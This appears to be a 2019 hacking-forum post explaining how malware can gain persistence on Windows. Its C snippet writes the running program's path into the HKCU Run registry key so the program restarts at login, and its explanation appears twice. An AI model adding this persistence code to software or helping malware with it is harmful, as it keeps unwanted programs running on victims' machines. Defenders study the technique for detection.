Adding keys to registry via WinAPI and C 06-28-2019, 02:19 AM
#1
I really don't know how to write this, but essentially with malware you would want persistency of some sort and the easiest method on Windows I have found thus far is simply adding your program to the registry of HKEY_CURRENT_USER. My setup was simple enough, I just had the program in %APPDATA% and went from there:
First you get the path of the current running program then you create the key and pass that value to the HKEY datatype. Afterwards you set the value which in my case was just the name of the key itself and also the path of the program. Of course, always close the key after you are done because just like with a file descriptor... it will remain open and possibly cause issues.
Code:
#include <windows.h>
void createRegKey() {
TCHAR szPath[MAX_PATH];
HKEY hkey;
GetModuleFileName( NULL, szPath, sizeof(szPath) );
RegCreateKeyEx( HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hkey, NULL );
RegSetValueEx( hkey, NAME, 0, REG_SZ, ( LPBYTE )szPath, sizeof( szPath ) );
RegCloseKey( hkey );
}First you get the path of the current running program then you create the key and pass that value to the HKEY datatype. Afterwards you set the value which in my case was just the name of the key itself and also the path of the program. Of course, always close the key after you are done because just like with a file descriptor... it will remain open and possibly cause issues.
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)